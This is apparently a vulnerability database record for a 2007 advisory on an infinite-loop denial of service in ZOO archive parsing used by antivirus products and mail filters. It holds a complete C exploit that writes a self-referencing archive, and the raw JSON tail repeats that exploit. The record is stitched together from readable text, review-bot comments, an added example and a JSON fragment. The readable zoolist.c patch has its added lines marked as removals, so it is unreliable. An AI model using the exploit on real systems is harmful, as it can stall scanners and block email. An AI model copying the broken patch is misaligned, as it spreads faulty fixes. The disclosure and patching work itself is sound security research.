var-200705-0187
Vulnerability from variot
unzoo.c, as used in multiple products including AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file. The Zoo compression algorithm is prone to a remote denial-of-service vulnerability. This issue arises when applications implementing the Zoo algorithm process certain malformed archives. A successful attack can exhaust system resources and trigger a denial-of-service condition. This issue affects Zoo 2.10 and other applications implementing the vulnerable algorithm.
Topic: Multiple vendors ZOO file decompression infinite loop DoS
Announced: 2007-05-04
Credits: Jean-Sebastien Guay-Leroux
Products: Multiple (see section III)
Impact: DoS (99% CPU utilisation)
CVE ID: CVE-2007-1669, CVE-2007-1670, CVE-2007-1671, CVE-2007-1672, CVE-2007-1673
I. BACKGROUND
Zoo is a compression program and format developed by Rahul Dhesi in the mid 1980s. The format is based on the LZW compression algorithm and compressed files are identified by the .zoo file extension.
II. The vulnerability lies in the algorithm used to locate the files inside the archive. Each file in a ZOO archive is identified by a direntry structure. These structures are linked together through a 'next' pointer, which is in fact an offset from the beginning of the file to the next direntry structure. By pointing 'next' at an already processed entry, it is possible to make the parser process the same file more than once. The ZOO parser then enters an infinite loop.
III. AFFECTED SOFTWARE
o Barracuda Spam Firewall
o Panda Software Antivirus
o avast! antivirus
o Avira AntiVir
o zoo-2.10
o unzoo.c
o WinAce
o PicoZip
IV. IMPACT
If this attack is conducted against a vulnerable antivirus, the host system will have its CPU at 100% utilization and may have problems answering other requests.
If this attack is conducted against an SMTP content filter running a vulnerable ZOO implementation, legitimate clients may be unable to send and receive email through this server.
V. SOLUTION
o Barracuda Spam Firewall - CVE-2007-1669: They fixed this problem in virusdef 2.0.6399 for firmware >= 3.4 and 2.0.6399o for firmware < 3.4 March 19th 2007.
o Panda Software Antivirus - CVE-2007-1670: They fixed this problem April 2nd 2007.
o avast! antivirus - CVE-2007-1672: They fixed this problem in version 4.7.981, April 14th 2007.
o Avira AntiVir - CVE-2007-1671: They fixed this problem in avpack32.dll version 7.3.0.6 March 22nd 2007.
o zoo-2.10 - CVE-2007-1669: This software is not maintained anymore. A patch for version 2.10 is provided in section VII of this advisory because some SMTP content filters may still use this software.
o unzoo.c - CVE-2007-1673: This software is not maintained anymore. No patch is provided for this software.
o WinAce was contacted but no response was received from them.
o PicoZip was contacted but no response was received from them.
VI. PROOF OF CONCEPT
Using the PIRANA framework version 0.3.3, available at http://www.guay-leroux.com , it is possible to test your SMTP server against this vulnerability.
Alternatively, here is an exploit that will create a file that will trigger the infinite loop condition when it is processed.
/*
Exploit for the vulnerability: Multiple vendors ZOO file decompression infinite loop DoS
coded by Jean-Sébastien Guay-Leroux September 2006
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Structure of a ZOO header
#define ZOO_HEADER_SIZE 0x0000002a
#define ZH_TEXT 0
#define ZH_TAG 20
#define ZH_START_OFFSET 24
#define ZH_NEG_START_OFFSET 28
#define ZH_MAJ_VER 32
#define ZH_MIN_VER 33
#define ZH_ARC_HTYPE 34
#define ZH_ARC_COMMENT 35
#define ZH_ARC_COMMENT_LENGTH 39
#define ZH_VERSION_DATA 41

// Structure of a ZOO directory entry (offsets relative to the entry start)
#define D_DIRENTRY_LENGTH 56
#define D_TAG 0
#define D_TYPE 4
#define D_PACKING_METHOD 5
#define D_NEXT_ENTRY 6
#define D_OFFSET 10
#define D_DATE 14
#define D_TIME 16
#define D_FILE_CRC 18
#define D_ORIGINAL_SIZE 20
#define D_SIZE_NOW 24
#define D_MAJ_VER 28
#define D_MIN_VER 29
#define D_DELETED 30
#define D_FILE_STRUCT 31
#define D_COMMENT_OFFSET 32
#define D_COMMENT_SIZE 36
#define D_FILENAME 38
#define D_VAR_DIR_LEN 51
#define D_TIMEZONE 53
#define D_DIR_CRC 54
#define D_NAMLEN ( D_DIRENTRY_LENGTH + 0 )
#define D_DIRLEN ( D_DIRENTRY_LENGTH + 1 )
#define D_LFILENAME ( D_DIRENTRY_LENGTH + 2 )

// Little-endian field writers
void put_byte (char *ptr, unsigned char data) {
    *ptr = data;
}

void put_word (char *ptr, unsigned short data) {
    put_byte (ptr, data);
    put_byte (ptr + 1, data >> 8);
}

void put_longword (char *ptr, unsigned long data) {
    put_byte (ptr, data);
    put_byte (ptr + 1, data >> 8);
    put_byte (ptr + 2, data >> 16);
    put_byte (ptr + 3, data >> 24);
}

FILE * open_file (char *filename) {
    FILE *fp;
    fp = fopen ( filename , "w" );
    if (!fp) {
        perror ("Cant open file");
        exit (1);
    }
    return fp;
}

void usage (char *progname) {
    printf ("\nTo use:\n");
    printf ("%s <archive name>\n\n", progname);
    exit (1);
}

int main (int argc, char *argv[]) {
    FILE *fp;
    char *hdr = (char *) malloc (4096);
    char *filename = (char *) malloc (256);
    int written_bytes;
    int total_size;

    if ( argc != 2) {
        usage ( argv[0] );
    }
    // Check the allocations before the buffers are used
    if (!hdr || !filename) {
        perror ("Error allocating memory");
        exit (1);
    }
    strncpy (filename, argv[1], 255);
    filename[255] = '\0';
    memset (hdr, 0x00, 4096);

    // Build a ZOO header
    memcpy (hdr + ZH_TEXT, "ZOO 2.10 Archive.\032", 18);
    put_longword (hdr + ZH_TAG, 0xfdc4a7dc);
    put_longword (hdr + ZH_START_OFFSET, ZOO_HEADER_SIZE);
    put_longword (hdr + ZH_NEG_START_OFFSET,
                  (ZOO_HEADER_SIZE) * -1);
    put_byte (hdr + ZH_MAJ_VER, 2);
    put_byte (hdr + ZH_MIN_VER, 0);
    put_byte (hdr + ZH_ARC_HTYPE, 1);
    put_longword (hdr + ZH_ARC_COMMENT, 0);
    put_word (hdr + ZH_ARC_COMMENT_LENGTH, 0);
    put_byte (hdr + ZH_VERSION_DATA, 3);

    // Build vulnerable direntry struct
    // (D_NEXT_ENTRY is set to 0x2a, the offset of this same entry)
    put_longword (hdr + ZOO_HEADER_SIZE + D_TAG, 0xfdc4a7dc);
    put_byte (hdr + ZOO_HEADER_SIZE + D_TYPE, 1);
    put_byte (hdr + ZOO_HEADER_SIZE + D_PACKING_METHOD, 0);
    put_longword (hdr + ZOO_HEADER_SIZE + D_NEXT_ENTRY, 0x2a);
    put_longword (hdr + ZOO_HEADER_SIZE + D_OFFSET, 0x71);
    put_word (hdr + ZOO_HEADER_SIZE + D_DATE, 0x3394);
    put_word (hdr + ZOO_HEADER_SIZE + D_TIME, 0x4650);
    put_word (hdr + ZOO_HEADER_SIZE + D_FILE_CRC, 0);
    put_longword (hdr + ZOO_HEADER_SIZE + D_ORIGINAL_SIZE, 0);
    put_longword (hdr + ZOO_HEADER_SIZE + D_SIZE_NOW, 0);
    put_byte (hdr + ZOO_HEADER_SIZE + D_MAJ_VER, 1);
    put_byte (hdr + ZOO_HEADER_SIZE + D_MIN_VER, 0);
    put_byte (hdr + ZOO_HEADER_SIZE + D_DELETED, 0);
    put_byte (hdr + ZOO_HEADER_SIZE + D_FILE_STRUCT, 0);
    put_longword (hdr + ZOO_HEADER_SIZE + D_COMMENT_OFFSET, 0);
    put_word (hdr + ZOO_HEADER_SIZE + D_COMMENT_SIZE, 0);
    memcpy (hdr + ZOO_HEADER_SIZE + D_FILENAME,
            "AAAAAAAA.AAA", 13);
    total_size = ZOO_HEADER_SIZE + 51;

    fp = open_file (filename);
    if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) {
        printf ("The file has been written\n");
    } else {
        printf ("Cant write to the file\n");
        exit (1);
    }
    fclose (fp);
    return 0;
}
VII. PATCH
To fix this issue, ensure that the offset of the next file to process is always greater than the offset of the one currently being processed. This guarantees that the same files cannot be processed over and over again. Here is a patch for zoo version 2.10, which is distributed with many UNIX systems:
diff -u zoo/zooext.c zoo-patched/zooext.c --- zoo/zooext.c 1991-07-11 15:08:00.000000000 -0400 +++ zoo-patched/zooext.c 2007-03-16 16:45:28.000000000 -0500 @@ -89,6 +89,7 @@ #endif struct direntry direntry; / directory entry / int first_dir = 1; / first dir entry seen? / +unsigned long zoo_pointer = 0; / Track our position in the file /
static char extract_ver[] = "Zoo %d.%d is needed to extract %s.\n"; static char no_space[] = "Insufficient disk space to extract %s.\n"; @@ -169,6 +170,9 @@ exit_status = 1; } zooseek (zoo_file, zoo_header.zoo_start, 0); / seek to where data begins / + + / Begin tracking our position in the file / + zoo_pointer = zoo_header.zoo_start; }
#ifndef PORTABLE @@ -597,6 +601,12 @@ } / end if /
loop_again: + + / Make sure we are not seeking to already processed data / + if (next_ptr <= zoo_pointer) + prterror ('f', "ZOO chain structure is corrupted\n"); + zoo_pointer = next_ptr; + zooseek (zoo_file, next_ptr, 0); / ..seek to next dir entry / } / end while /
diff -u zoo/zoolist.c zoo-patched/zoolist.c --- zoo/zoolist.c 1991-07-11 15:08:04.000000000 -0400 +++ zoo-patched/zoolist.c 2007-03-16 16:45:20.000000000 -0500 @@ -92,6 +92,7 @@ int show_mode = 0; / show file protection / #endif int first_dir = 1; / if first direntry -- to adjust dat_ofs / +unsigned long zoo_pointer = 0; / Track our position in the file /
while (option) { switch (option) { @@ -211,6 +212,9 @@ show_acmt (&zoo_header, zoo_file, 0); / show archive comment / }
- / Begin tracking our position in the file /
- zoo_pointer = zoo_header.zoo_start; + / Seek to the beginning of the first directory entry / if (zooseek (zoo_file, zoo_header.zoo_start, 0) != 0) { ercount++; @@ -437,6 +441,11 @@ if (verb_list && !fast) show_comment (&direntry, zoo_file, 0, (char ) NULL); } / end if (lots of conditions) */ +
- / Make sure we are not seeking to already processed data /
- if (direntry.next <= zoo_pointer)
- prterror ('f', "ZOO chain structure is corrupted\n");
- zoo_pointer = direntry.next;
/* ..seek to next dir entry */ zooseek (zoo_file, direntry.next, 0);
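Review bot: in the zooext.c hunk at loop_again, the new guard depends on prterror ('f', ...) never returning: if it does return, the next line still assigns zoo_pointer = next_ptr and the zooseek goes to the backward offset anyway. Follow the prterror call with an explicit exit or break so the guard holds however the 'f' severity is handled. The comparison is also made against an unsigned long; if next_ptr is a signed type (its declaration is not in the hunk), a negative value converts to a large unsigned one and passes, so reject negative offsets before comparing.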
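Review bot: in the zoolist.c hunk before the final zooseek (zoo_file, direntry.next, 0), the guard only enforces forward progress and the result of that seek is discarded, whereas the earlier seek to zoo_header.zoo_start in the same file is tested with != 0 and counted in ercount. Test the return value here as well, so that a direntry.next beyond the end of the archive is reported rather than silently ignored. The check also duplicates the one added to zooext.c with a different variable name; a shared helper would keep the extract and list paths from drifting apart.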
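The forward-progress rule from sections II and VII, as an added example (not code from the advisory or from zoo): a bounds-checked walk of the direntry chain over an in-memory buffer. It reuses the tag value and field offsets from the proof of concept above; the function names, the treatment of a zero 'next' as the end of the chain, and the constructed 128-byte sample are assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Tag value and offsets as they appear in the PoC on this page. */
#define ZOO_TAG          0xfdc4a7dcu
#define ZOO_HEADER_SIZE  0x2a
#define ZH_START_OFFSET  24
#define D_TAG            0
#define D_NEXT_ENTRY     6
#define D_MIN_READ       (D_NEXT_ENTRY + 4)  /* bytes this walker reads per entry */

enum zoo_status { ZOO_OK, ZOO_TRUNCATED, ZOO_BAD_TAG, ZOO_BACKWARD_LINK };

static uint32_t get_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)v;         p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16); p[3] = (unsigned char)(v >> 24);
}

/*
 * Walk the direntry chain. Every offset must lie inside the buffer and every
 * 'next' must be strictly greater than the current offset, so the offset
 * grows on each iteration and the loop is bounded by the buffer length.
 * Assumption of this example: a 'next' of 0 ends the chain.
 */
enum zoo_status walk_direntries(const unsigned char *buf, size_t len,
                                size_t *visited)
{
    uint32_t cur, next;

    *visited = 0;
    if (len < ZOO_HEADER_SIZE)
        return ZOO_TRUNCATED;
    cur = get_le32(buf + ZH_START_OFFSET);

    for (;;) {
        /* Bounds check before touching the entry. */
        if (cur > len || len - cur < D_MIN_READ)
            return ZOO_TRUNCATED;
        if (get_le32(buf + cur + D_TAG) != ZOO_TAG)
            return ZOO_BAD_TAG;
        (*visited)++;

        next = get_le32(buf + cur + D_NEXT_ENTRY);
        if (next == 0)
            return ZOO_OK;
        /* The check from section VII: never seek to processed data. */
        if (next <= cur)
            return ZOO_BACKWARD_LINK;
        cur = next;
    }
}

/* Constructed sample: header, entry A at 0x2a -> entry B at 0x70 -> next_of_b. */
void build_sample(unsigned char buf[128], uint32_t next_of_b)
{
    memset(buf, 0, 128);
    put_le32(buf + ZH_START_OFFSET, ZOO_HEADER_SIZE);
    put_le32(buf + 0x2a + D_TAG, ZOO_TAG);
    put_le32(buf + 0x2a + D_NEXT_ENTRY, 0x70);
    put_le32(buf + 0x70 + D_TAG, ZOO_TAG);
    put_le32(buf + 0x70 + D_NEXT_ENTRY, next_of_b);
}

int main(void)
{
    static const char *names[] = { "ok", "truncated", "bad tag", "backward link" };
    /* 0: clean end, 0x2a: back to A, 0x70: B points at itself,
       0x1000: past the end of the buffer. */
    const uint32_t cases[] = { 0, 0x2a, 0x70, 0x1000 };
    unsigned char buf[128];
    size_t i, visited;

    for (i = 0; i < sizeof cases / sizeof cases[0]; i++) {
        build_sample(buf, cases[i]);
        enum zoo_status st = walk_direntries(buf, sizeof buf, &visited);
        printf("next_of_b=0x%04x -> %s after %zu entries\n",
               (unsigned)cases[i], names[st], visited);
    }
    return 0;
}
```

Unlike the patch, which only compares offsets, this walker also rejects a forward 'next' that lands outside the buffer.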
VIII. CREDITS
Jean-Sebastien Guay-Leroux found the bug and wrote the exploit for it.
IX. REFERENCES
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1669
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1670
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1671
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1672
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1673
X. HISTORY
2006-09-?? : Vulnerability is found
2007-03-19 : All vendors notified
2007-03-19 : Barracuda Networks provided a fix
2007-03-22 : Avira provided a fix
2007-04-02 : Panda Antivirus provided a fix
2007-04-14 : avast! antivirus provided a fix
2007-05-04 : Public disclosure
\n\n/*\n\nExploit for the vulnerability:\nMultiple vendors ZOO file decompression infinite loop DoS\n\ncoded by Jean-S\\xe9bastien Guay-Leroux\nSeptember 2006\n\n*/\n\n#include \u003cstdio.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003cstring.h\u003e\n\n// Structure of a ZOO header\n\n#define ZOO_HEADER_SIZE 0x0000002a\n\n#define ZH_TEXT 0\n#define ZH_TAG 20\n#define ZH_START_OFFSET 24\n#define ZH_NEG_START_OFFSET 28\n#define ZH_MAJ_VER 32\n#define ZH_MIN_VER 33\n#define ZH_ARC_HTYPE 34\n#define ZH_ARC_COMMENT 35\n#define ZH_ARC_COMMENT_LENGTH 39\n#define ZH_VERSION_DATA 41\n\n\n#define D_DIRENTRY_LENGTH 56\n\n#define D_TAG 0\n#define D_TYPE 4\n#define D_PACKING_METHOD 5\n#define D_NEXT_ENTRY 6\n#define D_OFFSET 10\n#define D_DATE 14\n#define D_TIME 16\n#define D_FILE_CRC 18\n#define D_ORIGINAL_SIZE 20\n#define D_SIZE_NOW 24\n#define D_MAJ_VER 28\n#define D_MIN_VER 29\n#define D_DELETED 30\n#define D_FILE_STRUCT 31\n#define D_COMMENT_OFFSET 32\n#define D_COMMENT_SIZE 36\n#define D_FILENAME 38\n#define D_VAR_DIR_LEN 51\n#define D_TIMEZONE 53\n#define D_DIR_CRC 54\n#define D_NAMLEN ( D_DIRENTRY_LENGTH + 0 )\n#define D_DIRLEN ( D_DIRENTRY_LENGTH + 1 )\n#define D_LFILENAME ( D_DIRENTRY_LENGTH + 2 )\n\n\nvoid put_byte (char *ptr, unsigned char data) {\n *ptr = data;\n}\n\nvoid put_word (char *ptr, unsigned short data) {\n put_byte (ptr, data);\n put_byte (ptr + 1, data \u003e\u003e 8);\n}\n\nvoid put_longword (char *ptr, unsigned long data) {\n put_byte (ptr, data);\n put_byte (ptr + 1, data \u003e\u003e 8);\n put_byte (ptr + 2, data \u003e\u003e 16);\n put_byte (ptr + 3, data \u003e\u003e 24);\n}\n\nFILE * open_file (char *filename) {\n\n FILE *fp;\n\n fp = fopen ( filename , \"w\" );\n\n if (!fp) {\n perror (\"Cant open file\");\n exit (1);\n }\n\n return fp;\n}\n\nvoid usage (char *progname) {\n\n printf (\"\\nTo use:\\n\");\n printf (\"%s \u003carchive name\u003e\\n\\n\", progname);\n\n exit (1);\n}\n\nint main (int argc, char *argv[]) {\n FILE *fp;\n char 
*hdr = (char *) malloc (4096);\n char *filename = (char *) malloc (256);\n int written_bytes;\n int total_size;\n\n if ( argc != 2) {\n usage ( argv[0] );\n }\n\n strncpy (filename, argv[1], 255);\n\n if (!hdr || !filename) {\n perror (\"Error allocating memory\");\n exit (1);\n }\n\n memset (hdr, 0x00, 4096);\n\n // Build a ZOO header\n memcpy (hdr + ZH_TEXT, \"ZOO 2.10 Archive.\\032\", 18);\n put_longword (hdr + ZH_TAG, 0xfdc4a7dc);\n put_longword (hdr + ZH_START_OFFSET, ZOO_HEADER_SIZE);\n put_longword (hdr + ZH_NEG_START_OFFSET,\n (ZOO_HEADER_SIZE) * -1);\n put_byte (hdr + ZH_MAJ_VER, 2);\n put_byte (hdr + ZH_MIN_VER, 0);\n put_byte (hdr + ZH_ARC_HTYPE, 1);\n put_longword (hdr + ZH_ARC_COMMENT, 0);\n put_word (hdr + ZH_ARC_COMMENT_LENGTH, 0);\n put_byte (hdr + ZH_VERSION_DATA, 3);\n\n // Build vulnerable direntry struct\n put_longword (hdr + ZOO_HEADER_SIZE + D_TAG, 0xfdc4a7dc);\n put_byte (hdr + ZOO_HEADER_SIZE + D_TYPE, 1);\n put_byte (hdr + ZOO_HEADER_SIZE + D_PACKING_METHOD, 0);\n put_longword (hdr + ZOO_HEADER_SIZE + D_NEXT_ENTRY, 0x2a);\n put_longword (hdr + ZOO_HEADER_SIZE + D_OFFSET, 0x71);\n put_word (hdr + ZOO_HEADER_SIZE + D_DATE, 0x3394);\n put_word (hdr + ZOO_HEADER_SIZE + D_TIME, 0x4650);\n put_word (hdr + ZOO_HEADER_SIZE + D_FILE_CRC, 0);\n put_longword (hdr + ZOO_HEADER_SIZE + D_ORIGINAL_SIZE, 0);\n put_longword (hdr + ZOO_HEADER_SIZE + D_SIZE_NOW, 0);\n put_byte (hdr + ZOO_HEADER_SIZE + D_MAJ_VER, 1);\n put_byte (hdr + ZOO_HEADER_SIZE + D_MIN_VER, 0);\n put_byte (hdr + ZOO_HEADER_SIZE + D_DELETED, 0);\n put_byte (hdr + ZOO_HEADER_SIZE + D_FILE_STRUCT, 0);\n put_longword (hdr + ZOO_HEADER_SIZE + D_COMMENT_OFFSET, 0);\n put_word (hdr + ZOO_HEADER_SIZE + D_COMMENT_SIZE, 0);\n memcpy (hdr + ZOO_HEADER_SIZE + D_FILENAME,\n \"AAAAAAAA.AAA\", 13);\n\n total_size = ZOO_HEADER_SIZE + 51;\n\n fp = open_file (filename);\n\n if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) {\n printf (\"The file has been written\\n\");\n } else {\n printf 
(\"Cant write to the file\\n\");\n exit (1);\n }\n\n fclose (fp);\n\n return 0;\n}\n\n\nVII. PATCH\n\nTo fix this issue, ensure that the offset of the next file to process is\nalways greater than the one you are currently processing. This will\nguarantee the fact that it\u0027s not possible to process the same files over\nand over again. Here is a patch for the software zoo version 2.10\ndistributed with many UNIX systems:\n\n\ndiff -u zoo/zooext.c zoo-patched/zooext.c\n--- zoo/zooext.c 1991-07-11 15:08:00.000000000 -0400\n+++ zoo-patched/zooext.c 2007-03-16 16:45:28.000000000 -0500\n@@ -89,6 +89,7 @@\n #endif\n struct direntry direntry; /* directory entry */\n int first_dir = 1;\n /* first dir entry seen? */\n+unsigned long zoo_pointer = 0; /* Track our position\nin the file */\n\n static char extract_ver[] = \"Zoo %d.%d is needed to extract %s.\\n\";\n static char no_space[] = \"Insufficient disk space to extract %s.\\n\";\n@@ -169,6 +170,9 @@\n exit_status = 1;\n }\n zooseek (zoo_file, zoo_header.zoo_start, 0); /* seek to where data\n begins */\n+\n+ /* Begin tracking our position in the file */\n+ zoo_pointer = zoo_header.zoo_start;\n }\n\n #ifndef PORTABLE\n@@ -597,6 +601,12 @@\n } /* end if */\n\n loop_again:\n+\n+ /* Make sure we are not seeking to already processed data */\n+ if (next_ptr \u003c= zoo_pointer)\n+ prterror (\u0027f\u0027, \"ZOO chain structure is corrupted\\n\");\n+ zoo_pointer = next_ptr;\n+\n zooseek (zoo_file, next_ptr, 0); /* ..seek to next dir entry */\n } /* end while */\n\ndiff -u zoo/zoolist.c zoo-patched/zoolist.c\n--- zoo/zoolist.c 1991-07-11 15:08:04.000000000 -0400\n+++ zoo-patched/zoolist.c 2007-03-16 16:45:20.000000000 -0500\n@@ -92,6 +92,7 @@\n int show_mode = 0; /* show file protection */\n #endif\n int first_dir = 1; /* if first direntry -- to\n adjust dat_ofs */\n+unsigned long zoo_pointer = 0; /* Track our position in the file\n*/\n\n while (*option) {\n switch (*option) {\n@@ -211,6 +212,9 @@\n show_acmt (\u0026zoo_header, 
zoo_file, 0); /* show\n archive comment */\n }\n\n+ /* Begin tracking our position in the file */\n+ zoo_pointer = zoo_header.zoo_start;\n+\n /* Seek to the beginning of the first directory entry */\n if (zooseek (zoo_file, zoo_header.zoo_start, 0) != 0) {\n ercount++;\n@@ -437,6 +441,11 @@\n if (verb_list \u0026\u0026 !fast)\n show_comment (\u0026direntry, zoo_file, 0, (char *) NULL);\n } /* end if (lots of conditions) */\n+\n+ /* Make sure we are not seeking to already processed data */\n+ if (direntry.next \u003c= zoo_pointer)\n+ prterror (\u0027f\u0027, \"ZOO chain structure is corrupted\\n\");\n+ zoo_pointer = direntry.next;\n\n /* ..seek to next dir entry */\n zooseek (zoo_file, direntry.next, 0);\n\n\nVIII. CREDITS\n\nJean-Sebastien Guay-Leroux found the bug and wrote the exploit for it. \n\n\nIX. REFERENCES\n\n1. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1669\n\n2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1670\n\n3. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1671\n\n4. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1672\n\n5. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1673\n\n\nX. HISTORY\n\n2006-09-?? : Vulnerability is found\n2007-03-19 : All vendors notified\n2007-03-19 : Barracuda Networks provided a fix\n2007-03-22 : Avira provided a fix\n2007-04-02 : Panda Antivirus provided a fix\n2007-04-14 : avast! 
antivirus provided a fix\n2007-05-04 : Public disclosure\n", "sources": [ { "db": "NVD", "id": "CVE-2007-1673" }, { "db": "JVNDB", "id": "JVNDB-2007-001745" }, { "db": "BID", "id": "23823" }, { "db": "VULHUB", "id": "VHN-25035" }, { "db": "PACKETSTORM", "id": "56479" } ], "trust": 2.07 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2007-1673", "trust": 2.9 }, { "db": "BID", "id": "23823", "trust": 2.0 }, { "db": "SECUNIA", "id": "25315", "trust": 1.7 }, { "db": "OSVDB", "id": "36208", "trust": 1.7 }, { "db": "SREASON", "id": "2680", "trust": 1.7 }, { "db": "JVNDB", "id": "JVNDB-2007-001745", "trust": 0.8 }, { "db": "XF", "id": "34080", "trust": 0.6 }, { "db": "BUGTRAQ", "id": "20070504 MULTIPLE VENDORS ZOO FILE DECOMPRESSION INFINITE LOOP DOS", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-200705-118", "trust": 0.6 }, { "db": "VULHUB", "id": "VHN-25035", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "56479", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-25035" }, { "db": "BID", "id": "23823" }, { "db": "JVNDB", "id": "JVNDB-2007-001745" }, { "db": "PACKETSTORM", "id": "56479" }, { "db": "NVD", "id": "CVE-2007-1673" }, { "db": "CNNVD", "id": "CNNVD-200705-118" } ] }, "id": "VAR-200705-0187", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-25035" } ], "trust": 0.01 }, "last_update_date": "2023-12-18T12:12:33.864000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Top 
Page", "trust": 0.8, "url": "http://amavis.org/" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2007-001745" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-399", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-25035" }, { "db": "JVNDB", "id": "JVNDB-2007-001745" }, { "db": "NVD", "id": "CVE-2007-1673" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.7, "url": "http://www.securityfocus.com/bid/23823" }, { "trust": 1.7, "url": "http://www.amavis.org/security/asa-2007-2.txt" }, { "trust": 1.7, "url": "http://osvdb.org/36208" }, { "trust": 1.7, "url": "http://secunia.com/advisories/25315" }, { "trust": 1.7, "url": "http://securityreason.com/securityalert/2680" }, { "trust": 1.1, "url": "http://www.securityfocus.com/archive/1/467646/100/0/threaded" }, { "trust": 1.1, "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080" }, { "trust": 0.9, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1673" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-1673" }, { "trust": 0.6, "url": "http://www.barracudanetworks.com/ns/products/spam_overview.php" }, { "trust": 0.6, "url": "http://xforce.iss.net/xforce/xfdb/34080" }, { "trust": 0.6, "url": "http://www.securityfocus.com/archive/1/archive/1/467646/100/0/threaded" }, { "trust": 0.3, "url": "http://www.avast.com" }, { "trust": 0.3, "url": "http://www.avira.com/" }, { "trust": 0.3, "url": "http://www.pandasoftware.com/" }, { "trust": 0.3, "url": "http://www.picozip.com/" }, { "trust": 0.3, "url": "http://www.winace.com/" }, { "trust": 0.3, "url": "/archive/1/467646" 
}, { "trust": 0.3, "url": "http://archives.math.utk.edu/software/multi-platform/gap/util/unzoo.c" }, { "trust": 0.1, "url": "http://www.guay-leroux.com" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1671" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1672" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1669" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1670" } ], "sources": [ { "db": "VULHUB", "id": "VHN-25035" }, { "db": "BID", "id": "23823" }, { "db": "JVNDB", "id": "JVNDB-2007-001745" }, { "db": "PACKETSTORM", "id": "56479" }, { "db": "NVD", "id": "CVE-2007-1673" }, { "db": "CNNVD", "id": "CNNVD-200705-118" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-25035" }, { "db": "BID", "id": "23823" }, { "db": "JVNDB", "id": "JVNDB-2007-001745" }, { "db": "PACKETSTORM", "id": "56479" }, { "db": "NVD", "id": "CVE-2007-1673" }, { "db": "CNNVD", "id": "CNNVD-200705-118" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2007-05-09T00:00:00", "db": "VULHUB", "id": "VHN-25035" }, { "date": "2007-05-04T00:00:00", "db": "BID", "id": "23823" }, { "date": "2012-06-26T00:00:00", "db": "JVNDB", "id": "JVNDB-2007-001745" }, { "date": "2007-05-04T16:51:04", "db": "PACKETSTORM", "id": "56479" }, { "date": "2007-05-09T01:19:00", "db": "NVD", "id": "CVE-2007-1673" }, { "date": "2007-05-08T00:00:00", "db": "CNNVD", "id": "CNNVD-200705-118" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-10-16T00:00:00", "db": "VULHUB", "id": "VHN-25035" }, { "date": "2016-07-06T14:39:00", "db": "BID", "id": 
